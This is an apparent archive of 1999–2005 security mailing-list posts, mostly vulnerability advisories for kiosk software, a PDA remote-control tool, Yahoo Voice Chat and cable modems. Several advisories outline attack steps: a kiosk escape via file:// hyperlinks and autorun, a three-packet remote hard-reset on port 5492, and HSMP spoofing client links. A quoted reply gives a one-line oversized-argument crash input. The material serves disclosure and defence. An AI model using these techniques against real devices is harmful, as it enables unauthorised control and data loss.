The Web Application Security Consortium is proud to present 'Domain Contamination' written by Amit Klein. In this article Amit discusses how an attacker who's hijacked a domain for a short period of time can still retain control of its audience long after the domain is returned to its rightful owner. This document can be found at http://www.webappsec.org/projects/articles/020606.shtml Regards, - Robert Auger articles_at_webappsec.org http://www.webappsec.org Are you interested in writing a 'Guest Article' for the WASC? Additional information on article guidelines may be found at http://www.webappsec.org/articles/. Inquires can be sent to articles_at_webappsec.org "Contributed articles may include industry best practices, technical information about current issues, innovative defense techniques, etc. NO VENDOR PITCHES OR MARKETING GIMMICKS PLEASE. We are only soliciting concrete information from the experts on the front lines of the web application security field." http://www.webappsec.org";>http://www.webappsec.org
Announcement: The Web Application Firewall Evaluation Criteria v1 Released
The Web Application Firewall Evaluation Criteria project is proud to announce v1.0 of The Web Application Firewall Evaluation Criteria (WAFEC), its first official release. WAFEC is a result of a collaboration between web application firewall vendors and independent security professionals to create a comprehensive, vendor-neutral, web application firewall evaluation criteria. The resulting framework can be used to evaluate and and compare web application firewalls. WAFEC v1.0 can be downloaded from the project home page: http://www.webappsec.org/projects/wafec/ Participation in WAFEC is open to the interested parties. To comment on the work done so far or join the effort contact Ivan Ristic, the WAFEC project leader. Regards, [EMAIL PROTECTED] - The Web Security Mailing List http://www.webappsec.org/lists/websecurity/ The Web Security Mailing List Archives http://www.webappsec.org/lists/websecurity/archive/
Airscanner Mobile Security Advisory #05083102 Spb Kiosk Engine Program Bypass
Airscanner Mobile Security Advisory #05083102: Spb Kiosk Engine Program Bypass Product: Kiosk Engine 1.0.0.1 Platform: Tested on Windows Mobile Pocket PC 2003 Requirements: Mobile device running Windows Mobile Pocket PC with Kiosk Engine 1.0.0.1 installed Credits: Seth Fogie Airscanner Mobile Security http://www.airscanner.com Mobile Antivirus Researchers Association http://www.mobileav.org August 30 2005 Risk Level: Medium. Local attacker gains unauthorized control over device. Summary: Spb Kiosk Engine allows you to run your custom application(s) in kiosk mode. In this mode, the target applications are the only ones that can be used on a specific Pocket PC device. Details: The core Kiosk Engine is executed from the \windows\startup folder when the PDA boots. This ensures that the device is locked down and basically keeps a person from using other programs on the PDA. However, it is still possible to execute programs via 'features' of the running appliaction (eg. Pocket Word will execute programs via hyperlink - file://\windows\calc.exe). In addition, autorun is still enabled on the devices, which allows anyone with a SD Card or CF card to execute their own code on the device. Using this backdoor, we were able to overwrite the administrator passcode and alternately, remove the KioskEngine software altogether. Workaround: Disable autorun on the device by placing an autorun.exe file in the \windows directory with read-only options. Vendor Response Waiting response. Weblinks for advisories 05083101 and 05083102 http://www.airscanner.com/security/05083101_kioskpass.htm http://www.airscanner.com/security/05083102_kioskremove.htm Copyright (c) 2005 Airscanner Corp. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of Airscanner Corp. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please contact Airscanner Corp. for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use on an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Airscanner Mobile Security Advisory #0508310 Spb Kiosk Engine Administrator Password & Information Disclosure
Airscanner Mobile Security Advisory #05083101: Spb Kiosk Engine Administrator Password & Information Disclosure (Local) Product: Kiosk Engine 1.0.0.1 Platform: Tested on Windows Mobile Pocket PC 2003 Requirements: Mobile device running Windows Mobile Pocket PC with Kiosk Engine 1.0.0.1 installed Credits: Seth Fogie Airscanner Mobile Security http://www.airscanner.com Mobile Antivirus Researchers Association http://www.mobileav.org August 30 2005 Risk Level: Medium. Local attacker gains unauthorized control over device. Summary: Spb Kiosk Engine allows you to run your custom application(s) in kiosk mode. In this mode, the target applications are the only ones that can be used on a specific Pocket PC device. Details: Kiosk Engine allows an administrator to enter their passcode to gain full control over a PDA with the Kiosk Engine installed. This passcode is stored in the registry as plaintext and can be obtained several different ways (eg. remote registry access). Workaround: None Vendor Response Waiting response. Online Advisory: http://www.airscanner.com/security/05083101_kioskpass.htm Copyright (c) 2005 Airscanner Corp. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of Airscanner Corp. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please contact Airscanner Corp. for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use on an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Airscanner Mobile Security Advisory: Remote Hard Reset Data Wipe and DoS of Pocket Controller v5.0 (#AS05080401)
- Airscanner Mobile Security Advisory: (#AS05080401) (Critical) - Remote Hard Reset Data Wipe and DoS of Pocket Controller v5.0 (#AS05080401) Date of discovery: August 4, 2005 Product: Pocket Controller-Professional V5 (latest edition) Platform: Windows Mobile .NET, Windows Mobile Pocket PC Requirements: Windows Mobile Credits: Jonathan Read (CISSP) and Seth Fogie Airscanner Mobile Security www.airscanner.com Mobile Antivirus Researcher's Association http://www.mobileav.org/ Severity: Medium to High since any PDA running the application can be “hard reset” (up to complete loss of all data and installed applications) using a remote connection. This vulnerability can also be exploited over a wireless connection. Summary: Pocket Controller Professional is a popular, powerful remote control and management program that allows a user to remotely control a PDA from their PC computer. See http://www.soti.net/ for more information. Several feature of this program is that it can remotely turn off, reboot, and reset the PDA. We discovered that these commands can be performed without the client program sending only three packets to the target PDA. Details: Connect to port 5492 on PDA that is running the target client program. First send an initialization packet to the PDA. Next send a packet containing the desired command (turn off, reboot, hard reset) to the PDA. Finally, create a new socket and reset the intitialization packet. Upon receipt, the PDA will perform the selected function. PoC is available for MARA members. Workaround: No work around available. Initial Vendor Notification: August 4, 2005 Initial Vendor Response: Awaiting response. Legal: Copyright (c) 2005 Airscanner Corp. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of Airscanner Corp. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please contact Airscanner Corp. for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use on an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. This advisory can be viewed online at http://www.airscanner.com/security/pocketcontroller.htm
Mobile Antivirus Researchers Assoc. Call for White Papers
### Call for White Papers ### The Journal of Computer Virology in association with the Mobile Antivirus Researchers Assoc. invites authors to discuss the state of the art of malware and anti-malware technologies and security issues for mobile environments. Authors are invited to submit full technical papers of up to 25 pages presenting novel and mature research results. Papers will be reviewed and papers accepted will be published in a Special Issue of the Journal in Computer Virology. For more information please visit http://www.mobileav.org - M.A.R.A is a vendor neutral organization with no commercial agenda. Our organization is completely non profit and our members come from the global community of professional researchers.
Yahoo! Security Advisory: Yahoo! Voice Chat
- Yahoo! Security Advisory Subject:Yahoo! Voice Chat Control: buffer overflow Announced: 2003-05-30 Affects:Yahoo! Audio Conferencing versions prior to 1,0,0,45 running on any version of Microsoft Windows Corrected: 2003-05-30 1. Background Yahoo! Audio Conferencing (commonly known as Yahoo! Voice Chat) is a feature shared by Yahoo! Chat (a web-based service) and Yahoo! Messenger (a win32 client application). 2. Problem Description A buffer overflow exists in the Yahoo! Audio Conferencing control that is shared by Yahoo! Messenger and Yahoo! Chat. 3. Impact It may be possible for a remote attacker who can get a user to view malicious html code, most likely executed by getting a user to visit their Web page, to cause the user to be involuntarily logged out of chat, crash the user's browser, or potentially introduce executable code. To our knowledge, there have not been any executable code exploits related to this issue. 4. Solution An updated Yahoo! Audio Conferencing control must be installed. The CLSID of the control is 2B323CD9-50E3-11D3-9466-00A0C9700498 and the corrected version number version is 1,0,0,45. Users can test if they need to upgrade and install the update by visiting http://messenger.yahoo.com/messenger/security Yahoo! Messenger users will be prompted to update upon sign-in. Yahoo! Chat users will be served the new ActiveX control when entering a chat room. The update page will also be linked to from the Yahoo! Chat and Yahoo! Messenger home pages. 5. Workaround The control can be disabled by removing the object from the Internet Explorer "Downloaded Program Files" cache and, if Yahoo! Messenger is installed, going into the Yahoo! Messenger directory (by default, C:\Program Files\Yahoo!\Messenger\) and running the following command: regsvr32 /u yacscom.dll 6. Acknowledgments Cesar <[EMAIL PROTECTED]> discovered and reported this vulnerability. pgp0.pgp Description: PGP signature
KSR[T] Advisories #012: Hybrid Network's Cable Modems
KSR[T] Security Advisories http://www.ksrt.org Contact Account: [EMAIL PROTECTED] Advisory Subscription: Send an empty message to: [EMAIL PROTECTED] KSR[T] Advisory #012 Date: Oct. 6 1999 ID #: hybr-hsmp-012 Affected Program:Hybrid Network's Cable Modems Author: David Goldsmith <[EMAIL PROTECTED]> Summary: Remote attackers can anonymously reconfigure any Hybrid Network's cable modem that is running HSMP. This can be used to steal information and login/password pairs from cable modem users. Problem Description: Hybrid Network's cable modems can be configured via a UDP based protocol called HSMP. This protocol does not require any authentication to perform configuration requests. Since UDP is easily spoofed, configuration changes can made anonymously. Compromise: There are a plethora of denial of services attacks involving bad configuration settings (ethernet interfaces set to non-routable IP addresses, et al). HSMP can also be used to configure the DNS servers used by cable modem users, allowing attackers to redirect cable modem subscribers to a trojan site. More complex and theoretical attacks could involve the running of actual code through the debugging interface. This might allow remote attackers to deploy ethernet sniffers on the cable modem. Notes: KSR[T] found this vulnerability in parallel with Paul S. Cosis <[EMAIL PROTECTED]> and the l0pht. We would like to thank them for their input to this advisory. Patch/Fix: Cable providers should block out HSMP traffic (/udp) on their firewalls. Links: KSR[T] had initially written a demonstration HSMP client which is located at: http://www.ksrt.org/ksrt-hsmp.tar.gz There is also another HSMP client located at: http://www.larsshack.org/sw/ccm/ l0pht modified the above client and added the ability to spoof the source address, allowing for the anonymous reconfiguration of Hybrid cable modems). Their client is located at: http://c0re.l0pht.com/~sili/ccm-spoof.tar.gz
Re: your mail
This bug was initially found a year and a half ago. Please refer to http://www.ksrt.org/adv7.html. Filter is no longer a supported application and should not be used. KSR[T] On Thu, 9 Sep 1999, Mark Ultor wrote: > I've found a bug in filter on Elm 2.4 PL25. filter got SGID on mail group. > > sowatech:~$ filter -f `perl -e ' print "A" x 5000'` > Segmentation fault > > btw in elm bugs r everywhere better don't use it > > Greeetz > ___ > Ultor [[EMAIL PROTECTED]] - Network Security Adviser > " I hack the heads of little girls and put them on my wall " > > > -- > Wyslano za pomoca systemu Web Mail System. > http://www.sowatech.com.pl/ >